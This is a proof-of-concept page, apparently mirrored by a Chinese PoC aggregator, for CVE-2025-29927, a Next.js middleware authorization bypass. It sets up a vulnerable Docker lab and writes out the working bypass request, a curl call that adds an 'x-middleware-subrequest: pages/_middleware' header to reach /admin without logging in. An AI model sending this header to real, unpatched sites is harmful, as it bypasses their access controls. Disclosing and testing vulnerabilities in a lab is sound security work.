POC详情: 03c9ebc5ffbfe0381ab55b9ddd8f87f48c6425e1

来源
关联漏洞
标题: Next.js 安全漏洞 (CVE-2025-29927)
描述:Next.js是Vercel开源的一个 React 框架。 Next.js 14.2.25之前版本和15.2.3之前版本存在安全漏洞,该漏洞源于如果授权检查发生在中间件中,可能绕过授权检查。
描述
Research on Next.js middleware vulnerability (CVE-2025-29927) allowing authorization bypass and potential exploits.
介绍
# Next.js Middleware Vulnerability Research (CVE-2025-29927)

This repository demonstrates a critical **vulnerability in Next.js** middleware (CVE-2025-29927), which affects versions 11.1.4 through 15.1.7. This vulnerability allows for **authorization bypass**, **CSP bypass**, and potential **DoS attacks** through cache-poisoning. The issue originates in the way the `x-middleware-subrequest` header is handled, allowing attackers to bypass middleware protection mechanisms.

This proof of concept is specific for the vulnerability in **v12**

## Usage

### Environment setup

Set up the vulnerable environment using docker and the files from this repo by running:

```bash
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app
```

### Exploit 

This repository has the `exploit.sh` already created script to test the explotation of the vulnerability. Tu test it run:

```bash
chmod +x exploit.sh
./exploit.sh
```

Additionally you can test the explotation of the vulnerability by trying the following

1. Request the admin page without authentication. You should get a redirection to the `login` page.

```bash
curl -i http://localhost:3000/admin
```

2. Request the page without authentication but using the `x-middleware-subrequest` header. You should be able to bypass the authentication page.

```bash
curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin
```

## Security Advisory

- **CVE-2025-29927**: [Security Advisory Link](https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw)
文件快照

[4.0K] /data/pocs/03c9ebc5ffbfe0381ab55b9ddd8f87f48c6425e1 ├── [ 365] Dockerfile ├── [ 665] exploit.sh ├── [ 46] next.config.js ├── [ 242] package.json ├── [4.0K] pages │   ├── [ 369] about.js │   ├── [ 157] admin.js │   ├── [ 375] index.js │   ├── [ 550] login.js │   └── [1.3K] _middleware.js ├── [1.6K] README.md └── [4.0K] styles └── [ 119] global.css 2 directories, 11 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。